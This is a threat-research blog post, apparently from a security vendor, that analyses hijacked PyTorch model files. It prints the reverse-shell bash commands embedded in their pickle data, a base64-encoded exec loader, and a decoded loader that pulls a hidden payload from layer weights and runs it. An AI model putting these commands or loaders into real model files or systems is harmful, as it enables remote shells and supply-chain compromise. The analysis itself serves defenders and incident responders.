Over the past few months, HiddenLayer’s SAI team has investigated several machine learning models that have been hijacked for illicit purposes, be it to conduct security evaluation or to evade security detection. 

Previously, we’ve written about how ransomware can be embedded and deployed from ML models, how pickle files are used to launch post-exploitation frameworks, and the potential for supply chain attacks. In this blog, we’ll perform a technical deep dive into some models we uncovered that deploy reverse shells and a pair of nested models that may be brewing up something nasty. We hope this analysis will provide insight to reverse engineers, incident responders, and forensic analysts to better prepare them to handle targeted ML attacks in future incidents. 

Ghost in the (Reverse) Shell

In November, we discovered two small PyTorch/Zip models, 57.53KB in size, that contained just two layers. Both models had been uploaded to VirusTotal by the same submitter, originating in Taiwan, less than six minutes apart. The weights and biases differ between models, but both have the same layer names, shapes, data types, and sizes.

Layer Shape Datatype Size
l1.weight (512, 5) float64 20.5 kB
l1.bias (512,) float64 4.1 kB
l2.weight (8, 512) float64 32.8 kB
l2.bias (8,) float64 64 Bytes

As is typical for the latest Pytorch/Zip-based models, contained within each model is a file named “archive/data.pkl”, a pickle serialized structure that informs PyTorch about how to reconstruct the tensors containing the weights and biases. As we’ve alluded to in past blogs, pickle data files can be leveraged to execute arbitrary code. In this instance, both pickle files were subverted to include a posix system call used to spawn a reverse TCP bash shell on Linux/Mac operating systems.

The data.pkl pickle files in both models were serialized using version 2 of the pickle protocol and are largely identical across both models, except for minor tweaks to the IP address used for the reverse shell.

SHA256: 2572cf69b8f75ef8106c5e6265a912f7898166e7215ebba8d8668744b6327824

The first model, submitted on 17 November 2022 at 08:27:21 UTC, contains the following command embedded into data.pkl:

/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/9001 0>&1 &'

This will spawn a bash shell and redirect output to a TCP socket on localhost using port 9001.

SHA256: 19993c186674ef747f3b60efeee32562bdb3312c53a849d2ce514d9c9aa50d8a

The second model was submitted on the same day, nearly six minutes later at 08:33:00, and contains a slightly different command embedded into data.pkl:

/bin/bash -c '/bin/bash -i >& /dev/tcp/172.20.10.2/9001 0>&1 &'

This will spawn a bash shell and redirect output to a TCP socket on a private IP range over port 9001.

The filename for both models is identical and quite descriptive: rs_dnn_dict.pt (reverse shell deep neural network dictionary dot pre-trained). With the IP addresses for the reverse TCP shell being for the localhost/private range, the attacker could possibly use a netcat listener or other tunneling software to proxy commands. It is likely that these models were simply used for red-teaming, but we cannot rule out their use as part of a targeted attack.

Disassembling the data.pkl files, we notice that the positioning of the system command within the data structure is also highly interesting, as most off-the-shelf attack tooling (such as fickling) usually either appends or prepends commands to an existing pickle file. However, for the data.pkl files contained within these models, the commands reside in the middle of the pickled data structure, suggesting that the attacker has possibly modified the PyTorch sources to create the malicious models rather than simply run a tool to inject commands afterward. Across both samples, the “posix system” Python command is used to spawn the bash shell, as demonstrated in the disassembly below:

374: q BINPUT 36
376: R REDUCE
377: q BINPUT 37
379: X BINUNICODE 'ignore'
390: q BINPUT 38
392: c GLOBAL 'posix system'
406: q BINPUT 39
408: X BINUNICODE "/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/9001 0>&1 &'"
474: q BINPUT 40
476: \x85 TUPLE1
477: q BINPUT 41
479: R REDUCE
480: q BINPUT 42
482: u SETITEMS (MARK at 33)

PyTorch with a Sophisticated SimpleNet Payload

If you thought reverse shells were bad enough, we also came across something a little more intricate – and interesting – namely a PyTorch machine-learning model on VirusTotal that contains a multi-stage Python-based payload. The model was submitted very recently, on 4 February 2023 at 08:29:18 UTC, purportedly by a user in Singapore.

By comparing the VirusTotal upload time with a compile timestamp embedded in the final stage payload, we noticed that the sample was uploaded approximately 30 minutes after it was first created. Based on this information, we can postulate that this model was likely developed by a researcher or adversary who was testing anti-virus detection efficacy for this delivery mechanism/attack vector.

SHA256:  80e9e37bf7913f7bcf5338beba5d6b72d5066f05abd4b0f7e15c5e977a9175c2

The model file for this attack, named model.pt, is 1.66 MB (1,747,607 bytes) in size and saved as a legacy PyTorch pickle, serialized using version 4 of the pickle protocol (whereas newer PyTorch models use Zip files for storage). Disassembling the model’s pickled data reveals the following opcodes:

0: \x80 PROTO 4
2: \x95 FRAME 1572
11: \x8c SHORT_BINUNICODE 'builtins'
21: \x94 MEMOIZE (as 0)
22: \x8c SHORT_BINUNICODE 'exec'
28: \x94 MEMOIZE (as 1)
29: \x93 STACK_GLOBAL
30: \x94 MEMOIZE (as 2)
31: X BINUNICODE "import base64\nexec(base64.b64decode('aW1wb3J0IHRvcmNoCmZyb20gaW8gaW1wb3J0IEJ5dGVzSU8KaW1wb3J0IHN1YnByb2Nlc3MKCmRlZiBmKHcsIG4pOgogICAgaW1wb3J0IG51bXB5IGFzIG5wCiAgICBtZmIgID0gbnAuYXNhcnJheShbMV0gKiA4ICsgWzBdICogMjQsIGR0eXBlPWJvb2wpCiAgICBtbGIgPSB+bWZiCgogICAgZGVmIF9iaXRfZXh0KGVtYl9hcnIsIHNlcV9sZW4sIGNodW5rX3NpemUsIG1hc2spOgogICAgICAgIGJ5dGVfYXJyID0gbnAuZnJvbWJ1ZmZlcihlbWJfYXJyLCBkdHlwZT1ucC51aW50MzIpCiAgICAgICAgc2l6ZSA9IGludChucC5jZWlsKHNlcV9sZW4gKiA4IC8gY2h1bmtfc2l6ZSkpCiAgICAgICAgcHJvY2Vzc19ieXRlcyA9IG5wLnJlc2hhcGUobnAudW5wYWNrYml0cyhucC5mbGlwKG5wLmZyb21idWZmZXIoYnl0ZV9hcnJbOnNpemVdLCBkdHlwZT1ucC51aW50OCkpKSwgKHNpemUsIDMyKSkKICAgICAgICByZXN1bHQgPSBucC5wYWNrYml0cyhucC5mbGlwKHByb2Nlc3NfYnl0ZXNbOiwgbWFza10pWzo6LTFdLmZsYXR0ZW4oKSwgYml0b3JkZXI9ImxpdHRsZSIpWzo6LTFdCiAgICAgICAgcmV0dXJuIHJlc3VsdC5hc3R5cGUobnAudWludDgpWy1zZXFfbGVuOl0udG9ieXRlcygpCgogICAgcmV0dXJuIF9iaXRfZXh0KHcsIG4sIG5wLmNvdW50X25vbnplcm8obWxiKSwgbWxiKQoKd2l0aCBvcGVuKCdtb2RlbC5wdCcsICdyYicpIGFzIGZpbGU6CiAgICBmaWxlLnNlZWsoLTE3NDYwMjQsIDIpCiAgICBkYXRhID0gQnl0ZXNJTyhmaWxlLnJlYWQoKSkKCm1vZGVsID0gdG9yY2gubG9hZChkYXRhKQoKZm9yIGksIGxheWVyIGluIGVudW1lcmF0ZShtb2RlbC5tb2R1bGVzKCkpOgogICAgaWYgaGFzYXR0cihsYXllciwgJ3dlaWdodCcpOgogICAgICAgIGlmIGkgPT0gNzoKICAgICAgICAgICAgY29udGFpbmVyX2xheWVyID0gbGF5ZXIKCmNvbnRhaW5lciA9IGNvbnRhaW5lcl9sYXllci53ZWlnaHQuZGV0YWNoKCkubnVtcHkoKQpkYXRhID0gZihjb250YWluZXIsIDM3OCkKCndpdGggb3BlbignZXh0cmFjdC5weWMnLCAnd2InKSBhcyBmaWxlOgogICAgZmlsZS53cml0ZShkYXRhKQoKc3VicHJvY2Vzcy5Qb3BlbigncHl0aG9uIGV4dHJhY3QucHljJywgc2hlbGw9VHJ1ZSk=').decode('utf-8'))\n"
1577: \x94 MEMOIZE (as 3)
1578: \x85 TUPLE1
1579: \x94 MEMOIZE (as 4)
1580: R REDUCE
1581: \x94 MEMOIZE (as 5)
1582: 0 POP
1583: \x80 PROTO 2
1585: \x8a LONG1 119547037146038801333356
1597: . STOP

During loading of the model, Python’s built-in “exec” function is triggered when unpickling the model’s data and is used to decode and execute a Base64 encoded payload. The decoded Base64 payload yields a small Python script:

import torch
from io import BytesIO
import subprocess


def f(w, n):
    import numpy as np
    mfb  = np.asarray([1] * 8 + [0] * 24, dtype=bool)
    mlb = ~mfb


    def _bit_ext(emb_arr, seq_len, chunk_size, mask):
        byte_arr = np.frombuffer(emb_arr, dtype=np.uint32)
        size = int(np.ceil(seq_len * 8 / chunk_size))
        process_bytes = np.reshape(np.unpackbits(np.flip(np.frombuffer(byte_arr[:size], dtype=np.uint8))), (size, 32))
        result = np.packbits(np.flip(process_bytes[:, mask])[::-1].flatten(), bitorder="little")[::-1]
        return result.astype(np.uint8)[-seq_len:].tobytes()


    return _bit_ext(w, n, np.count_nonzero(mlb), mlb)


with open('model.pt', 'rb') as file:
    file.seek(-1746024, 2)
    data = BytesIO(file.read())


model = torch.load(data)


for i, layer in enumerate(model.modules()):
    if hasattr(layer, 'weight'):
        if i == 7:
            container_layer = layer


container = container_layer.weight.detach().numpy()
data = f(container, 378)


with open('extract.pyc', 'wb') as file:
    file.write(data)


subprocess.Popen('python extract.pyc', shell=True)

This payload is a simple second-stage loader that will first open the model.pt file on-disk, then seek back to a fixed offset from the end of the file and read a portion of the file into memory. When viewed in a hex editor, intriguingly, we can see that the file data contains another PyTorch model, serialized using pickle version 2 (another legacy PyTorch model) and constructed using the “SimpleNet” neural network architecture:

There are also some helpful strings leaked in the model, which allude to the filesystem location where the original files were stored and that the author was trying to create a “deep steganography” payload (and also uses the PyCharm editor on an Ubuntu system with the Anaconda Python distribution!):

  • /home/ubuntu/Documents/Pycharm Projects/Torch-Pickle-Codes-main/gen-test/simplenet.py
  • /home/ubuntu/anaconda3/envs/deep-stego/lib/python3.10/site-packages/torch/nn/modules/conv.py
  • /home/ubuntu/anaconda3/envs/deep-stego/lib/python3.10/site-packages/torch/nn/modules/activation.py
  • /home/ubuntu/anaconda3/envs/deep-stego/lib/python3.10/site-packages/torch/nn/modules/pooling.py
  • /home/ubuntu/anaconda3/envs/deep-stego/lib/python3.10/site-packages/torch/nn/modules/linear.py

Next, the payload script will load the torch model from the in-memory data, and then enumerate the layers of the neural network to find the weights of the 7th layer, from which a final stage payload will be extracted. The final stage payload is decoded from the 7th layer’s weights using the _bit_ext function, which is used to flip the order of the bits in the tensor. Finally, the resulting payload is written to a file called extract.pyc, and executed using subprocess.Popen.

The final stage payload is a Python 3.10.0 compiled script, 356 bytes in size. The original filename of the script was “benign.py,” and it was compiled on 2023-02-04 at 07:58:46 (this is the compile timestamp we referenced earlier when comparing with the VT upload time). Compiled Python 3.10 code is a bit of a fiddle to disassemble, but the original code was roughly as follows:

import subprocess
processes = ['notify-send "HELLO!!!!!!" "Your file is compromised"'] + ["zenity --error --text='An error occurred\! Your pc is compromised :) Check your files properly next time :O'"]
for process in processes:
    subprocess.Popen(process, shell=True)

When run, the script spawns the “notify-send” and “zlzenity” Linux commands to alert the user by sending a notification to the desktop. However, the attacker can easily replace the script with something less benign in the future.

Conclusions

Don’t be the victim of a supply-chain attack – if you source your models externally, be it from third-party providers or model hubs, make sure you verify that what you’re getting hasn’t been hijacked. The same goes if you’re providing your models to others – the only thing worse than being on the receiving end of a supply chain attack is being the supplier!

Models are often privy to highly sensitive data, which may be your competitive advantage in your field or your consumer’s personal information. Ensure that you have enforced controls around the deployment of machine learning models and the systems that support them. We recently demonstrated how trivial it is to steal data from S3 buckets if a hijacked model is deployed. 

What’s significant about these malicious files is that each has zero hits for detection by any vendor on VirusTotal. To this end, it reaffirms a troubling lack of scrutiny around the problem of code execution through model binaries. Python payloads, especially pickle serialized data leveraging code execution and pre-compiled Python scripts, are also often poorly detected by security solutions and are becoming an appealing choice for targeted attacks, as we’ve seen with the Mythic/Medusa red-teaming framework. 

HiddenLayer’s Model Scanner detects all models mentioned in this blog:


The more we look, the more we find – it’s evident that as ML continues to become the zeitgeist of the decade, the more threats we’ll find assailing these systems and those that support them.

Indicators of Compromise

Indicator Type Description
2572cf69b8f75ef8106c5e6265a912f7898166e7215ebba8d8668744b6327824 SHA256 rs_dnn_dict.pt spawning bash shell redirecting output to 127.0.0.1
19993c186674ef747f3b60efeee32562bdb3312c53a849d2ce514d9c9aa50d8a SHA256 rs_dnn_dict.pt spawning bash shell redirecting output to 172.20.10.2
rs_dnn_dict.pt Filename Filename for both reverse shell models
/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/9001 0>&1 &' Command-line Reverse shell command from 2572cf…7824
/bin/bash -c '/bin/bash -i >& /dev/tcp/172.20.10.2/9001 0>&1 &' Command-line Reverse shell command from 19993c…0d8a
80e9e37bf7913f7bcf5338beba5d6b72d5066f05abd4b0f7e15c5e977a9175c2 SHA256 Hijacked SimpleNet model
model.pt Filename Filename for the SimpleNet model
extract.pyc Filename Final stage payload for the SimpleNet model
780c4e6ea4b68ae9d944225332a7efca88509dbad3c692b5461c0c6be6bf8646 SHA256 extract.pyc final payload from the SimpleNet model

MITRE ATLAS/ATT&CK Mapping

Technique ID MITRE Framework Technique Name
AML.T0011.000 ATLAS User Execution: Unsafe ML Artifacts
AML.T0010.003 ATLAS ML Supply Chain Compromise: Model
T1059.004 ATT&CK Command and Scripting Interpreter: Unix Shell
T1059.006 ATT&CK Command and Scripting Interpreter: Python
T1090.001 ATT&CK Proxy: Internal Proxy